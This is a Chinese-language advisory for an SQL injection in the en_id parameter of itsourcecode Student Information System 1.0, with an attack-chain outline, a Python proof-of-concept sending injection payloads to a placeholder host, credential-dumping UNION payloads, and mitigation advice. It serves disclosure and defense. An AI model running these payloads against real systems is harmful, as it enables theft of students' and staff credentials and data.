CVE-2025-13325 itsourcecode学生信息系统SQL注入漏洞

漏洞信息

漏洞编号

CVE-2025-13325

漏洞类型

SQL注入

CVSS评分

6.3 中危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

itsourcecode Student Information System 1.0

漏洞概述

CVE-2025-13325是itsourcecode学生信息系统1.0版本中的一个高危SQL注入漏洞。该漏洞存在于/enrollment_edit1.php文件中的en_id参数，由于应用程序未对用户输入进行充分的过滤和验证，攻击者可以通过构造恶意的SQL语句实现数据库注入攻击。成功利用此漏洞的攻击者可以在无需高权限的情况下远程执行SQL查询，获取数据库中的敏感信息，包括学生个人信息、成绩数据、管理员凭据等。CVSS评分6.3，属于中等严重程度，但由于攻击复杂度低且可远程利用，对使用该系统的教育机构构成了实际的安全威胁。攻击者可以利用获取的数据进行身份冒充、数据篡改或进一步横向移动攻击。该漏洞已被公开披露，漏洞利用代码已在互联网传播，建议受影响用户尽快采取修复措施。

技术细节

该SQL注入漏洞存在于itsourcecode学生信息系统的/enrollment_edit1.php文件中的en_id参数。漏洞产生的根本原因是应用程序在处理用户输入时直接将该参数值拼接到SQL查询语句中，未使用参数化查询或输入过滤机制。攻击者可以通过在en_id参数中注入SQL语句来实现以下攻击：1) 使用UNION SELECT语句提取数据库中的敏感数据；2) 使用布尔型盲注技术通过响应差异推断数据内容；3) 使用时间型盲注通过响应延迟获取数据；4) 在某些配置下可能实现操作系统命令执行。漏洞利用无需特殊权限，普通学生或教职员工账户即可发起攻击。攻击者可通过自动化工具快速提取数据库内容，攻击过程隐蔽性较高。修复方案包括：使用参数化查询替代字符串拼接、对用户输入进行严格的白名单验证、实施最小权限原则限制数据库账户权限、部署Web应用防火墙等。

攻击链分析

STEP 1

步骤1

侦察阶段：攻击者扫描目标系统，识别出使用itsourcecode学生信息系统的网站，并确认/enrollment_edit1.php文件存在

STEP 2

步骤2

漏洞探测：攻击者使用自动化工具对en_id参数进行SQL注入测试，验证漏洞存在性

STEP 3

步骤3

信息收集：通过UNION注入或盲注技术提取数据库结构信息，获取表名、列名等元数据

STEP 4

步骤4

敏感数据提取：利用SQL注入漏洞获取用户表中的用户名、密码哈希等敏感信息

STEP 5

步骤5

权限提升：使用获取的凭据登录系统后台，可能进一步获取管理员权限

STEP 6

步骤6

持久化控制：在某些情况下，攻击者可能通过SQL注入写入恶意代码或创建后门账户

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests

# CVE-2025-13325 SQL Injection PoC
# Target: itsourcecode Student Information System 1.0
# File: /enrollment_edit1.php
# Parameter: en_id

target_url = "http://target.com/enrollment_edit1.php"

# Basic SQL Injection test payloads
payloads = [
    "1' OR '1'='1",  # Basic authentication bypass
    "1' UNION SELECT NULL--",  # Union-based injection test
    "1' AND SLEEP(5)--",  # Time-based blind injection
    "1' AND 1=1--",  # Boolean-based injection test
]

def test_sql_injection(url, param='en_id'):
    print(f"[*] Testing SQL injection on {url}")
    print(f"[*] Target parameter: {param}")
    
    for payload in payloads:
        data = {param: payload}
        try:
            response = requests.post(url, data=data, timeout=10)
            print(f"[+] Payload: {payload}")
            print(f"    Status: {response.status_code}")
            print(f"    Length: {len(response.text)}")
        except requests.exceptions.RequestException as e:
            print(f"[-] Error with payload {payload}: {e}")

# Data extraction example (requires manual adaptation)
def extract_database_info(url):
    # Database version extraction
    version_payload = "1' UNION SELECT @@version--"
    # Database name extraction  
    dbname_payload = "1' UNION SELECT database()--"
    # Users table extraction
    users_payload = "1' UNION SELECT GROUP_CONCAT(user_id,':',username,':',password) FROM users--"
    
    print("[*] Example extraction payloads:")
    print(f"    Version: {version_payload}")
    print(f"    Database: {dbname_payload}")
    print(f"    Users: {users_payload}")

if __name__ == "__main__":
    test_sql_injection(target_url)
    extract_database_info(target_url)

影响范围

itsourcecode Student Information System 1.0

防御指南

临时缓解措施

在官方修复补丁发布前，可采取以下临时缓解措施：1) 在Web应用防火墙中配置SQL注入防护规则，拦截异常的SQL特征字符；2) 限制/enrollment_edit1.php文件的访问权限，仅允许授权用户访问；3) 对数据库账户权限进行最小化配置，限制其对敏感表的写操作；4) 实施入侵检测系统监控异常的SQL查询行为；5) 定期备份数据库，以便在发生数据泄露时快速恢复。建议尽快应用官方安全更新。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2025-13325
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2025-13325
3 Details https://www.cvedetails.com/cve/CVE-2025-13325/
4 VulDB https://vuldb.com/cve/CVE-2025-13325
5 Link https://github.com/chenxiyue-2006/CVE/issues/1
6 Link https://itsourcecode.com/
7 Link https://vuldb.com/?ctiid.332669
8 Link https://vuldb.com/?id.332669
9 Link https://vuldb.com/?submit.691929
10 Link https://github.com/chenxiyue-2006/CVE/issues/1